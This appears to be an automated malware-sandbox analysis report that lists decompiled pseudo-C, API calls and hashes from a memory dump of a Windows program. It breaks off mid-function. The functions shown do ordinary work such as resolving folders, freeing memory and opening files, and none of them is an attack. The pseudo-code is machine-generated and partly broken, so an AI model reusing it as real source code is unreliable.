                                                                    0x006ac585
                                                                    0x006ac4e4
                                                                    0x006ac4e6
                                                                    0x006ac4e7
                                                                    0x006ac4ec
                                                                    0x006ac4ef
                                                                    0x006ac4fa
                                                                    0x006ac501
                                                                    0x006ac504
                                                                    0x006ac507
                                                                    0x006ac50c
                                                                    0x006ac50f
                                                                    0x006ac510
                                                                    0x006ac515
                                                                    0x006ac515
                                                                    0x006ac491
                                                                    0x006ac493
                                                                    0x006ac494
                                                                    0x006ac499
                                                                    0x006ac49c
                                                                    0x006ac4a7
                                                                    0x006ac4ae
                                                                    0x006ac4b1
                                                                    0x006ac4b4
                                                                    0x006ac4b9
                                                                    0x006ac4bc
                                                                    0x006ac4bd
                                                                    0x006ac4c2
                                                                    0x006ac4c2

                                                                    APIs
                                                                    • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                    • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                    • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                    • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FolderFreeKnownPathTask
                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                    • API String ID: 969438705-544719455
                                                                    • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                    • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                                    • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                    • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 47%
                                                                    			E006AC4CA() {
				void* _t10;
				intOrPtr _t11;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t36;
				intOrPtr _t41;
				void* _t42;
				intOrPtr _t43;

				_t10 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t42 - 4); // executed
				if(_t10 != 0) {
					if( *0x6d67dc == 0) {
						_t11 =  *0x6d6534; // 0x0
						E005C4EA4(_t11, _t42 - 0x38);
						E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t42 - 0x38))); // executed
					} else {
						_t19 =  *0x6d6538; // 0x0
						E005C4EA4(_t19, _t42 - 0x34);
						E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t42 - 0x34)));
					}
					E006AC180(); // executed
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E006AC58D);
					return E0040A228(_t42 - 0x38, 0xd);
				} else {
					_push(_t42);
					_push(0x6ac516);
					_push( *[fs:eax]);
					 *[fs:eax] = _t43;
					E0040C8BC();
					_pop(_t41);
					 *[fs:eax] = _t41;
					_push(E006AC51D);
					_t27 =  *((intOrPtr*)(_t42 - 4));
					_push(_t27);
					L0043C214();
					return _t27;
				}
			}











                                                                    0x006ac4da
                                                                    0x006ac4e2
                                                                    0x006ac524
                                                                    0x006ac54a
                                                                    0x006ac54f
                                                                    0x006ac561
                                                                    0x006ac526
                                                                    0x006ac529
                                                                    0x006ac52e
                                                                    0x006ac540
                                                                    0x006ac540
                                                                    0x006ac566
                                                                    0x006ac56d
                                                                    0x006ac570
                                                                    0x006ac573
                                                                    0x006ac585
                                                                    0x006ac4e4
                                                                    0x006ac4e6
                                                                    0x006ac4e7
                                                                    0x006ac4ec
                                                                    0x006ac4ef
                                                                    0x006ac4fa
                                                                    0x006ac501
                                                                    0x006ac504
                                                                    0x006ac507
                                                                    0x006ac50c
                                                                    0x006ac50f
                                                                    0x006ac510
                                                                    0x006ac515
                                                                    0x006ac515

                                                                    APIs
                                                                    • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                    • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FolderFreeKnownPathTask
                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                    • API String ID: 969438705-544719455
                                                                    • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                    • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                                    • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                    • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004786AC(struct HWND__* __eax) {
				int _t3;
				struct HWND__* _t7;

				_t7 = __eax;
				_t6 = GetWindowLongW(__eax, 0xfffffffc);
				_t3 = DestroyWindow(_t7); // executed
				if(_t2 != L00414778) {
					return E004784F4(_t6);
				}
				return _t3;
			}





                                                                    0x004786ae
                                                                    0x004786b8
                                                                    0x004786bb
                                                                    0x004786c6
                                                                    0x00000000
                                                                    0x004786ca
                                                                    0x004786d1

                                                                    APIs
                                                                    • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                                    • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$DestroyLong
                                                                    • String ID:
                                                                    • API String ID: 2871862000-0
                                                                    • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                    • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                                    • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                    • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00406DF0() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x006CFAE0;
				while(_t28 != 0x6cfadc) {
					_t2 = _t28 + 4; // 0x6cfadc
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x6c5084;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x6cfadc = 0x6cfadc;
				 *0x006CFAE0 = 0x6cfadc;
				_t26 = 0x400;
				_t23 = 0x6cfb7c;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x6cfb7c
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x6cfaf8 = 0;
				E00407760(0x6cfafc, 0x80);
				_t18 = 0;
				 *0x6cfaf4 = 0;
				_t31 =  *0x006D1B84;
				while(_t31 != 0x6d1b80) {
					_t10 = _t31 + 4; // 0x6d1b80
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x6d1b80 = 0x6d1b80;
				 *0x006D1B84 = 0x6d1b80;
				return _t18;
			}











                                                                    0x00406dfe
                                                                    0x00406e15
                                                                    0x00406e03
                                                                    0x00406e0e
                                                                    0x00406e13
                                                                    0x00406e13
                                                                    0x00406e19
                                                                    0x00406e1e
                                                                    0x00406e23
                                                                    0x00406e25
                                                                    0x00406e2a
                                                                    0x00406e2d
                                                                    0x00406e36
                                                                    0x00406e39
                                                                    0x00406e3c
                                                                    0x00406e3c
                                                                    0x00406e3f
                                                                    0x00406e41
                                                                    0x00406e44
                                                                    0x00406e49
                                                                    0x00406e4e
                                                                    0x00406e4e
                                                                    0x00406e50
                                                                    0x00406e52
                                                                    0x00406e52
                                                                    0x00406e55
                                                                    0x00406e58
                                                                    0x00406e58
                                                                    0x00406e5d
                                                                    0x00406e6e
                                                                    0x00406e73
                                                                    0x00406e75
                                                                    0x00406e7a
                                                                    0x00406e91
                                                                    0x00406e7f
                                                                    0x00406e8a
                                                                    0x00406e8f
                                                                    0x00406e8f
                                                                    0x00406e95
                                                                    0x00406e97
                                                                    0x00406e9e

                                                                    APIs
                                                                    • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                                    • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                    • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                                    • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                    • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                    • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                                    • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                    • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                    • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                                    • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                    • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C857C(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E0040A350(_t10, _t7, _t17, _t20);
			}








                                                                    0x005c8583
                                                                    0x005c859b
                                                                    0x005c85a3
                                                                    0x005c85a7
                                                                    0x005c85b0
                                                                    0x005c85a2
                                                                    0x005c85a2
                                                                    0x005c85a2
                                                                    0x00000000
                                                                    0x005c85b2
                                                                    0x005c85b2
                                                                    0x005c85b6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x005c85b6
                                                                    0x00000000
                                                                    0x005c85b0
                                                                    0x005c85c9

                                                                    APIs
                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FormatMessage
                                                                    • String ID:
                                                                    • API String ID: 1306739567-0
                                                                    • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                    • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                                    • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                    • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 31%
                                                                    			E005C6808(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x5c684e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E005C567C(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E0040B278(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E005C6855);
				return E0040A1C8( &_v8);
			}






                                                                    0x005c680b
                                                                    0x005c6812
                                                                    0x005c6813
                                                                    0x005c6818
                                                                    0x005c681b
                                                                    0x005c6823
                                                                    0x005c6831
                                                                    0x005c683a
                                                                    0x005c683d
                                                                    0x005c6840
                                                                    0x005c684d

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
                                                                    • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                                    • Opcode Fuzzy Hash: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
                                                                    • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040D754(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040E9E0(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                                    0x0040d75c
                                                                    0x0040d75e
                                                                    0x0040d762
                                                                    0x0040d772
                                                                    0x0040d77b
                                                                    0x0040d780
                                                                    0x0040d782
                                                                    0x0040d787
                                                                    0x0040d78c
                                                                    0x0040d78c
                                                                    0x0040d787
                                                                    0x0040d79a

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                                      • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                      • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                    • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                                    • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                    • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005118B8, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E005118B8(intOrPtr* __eax, void* __edx) {
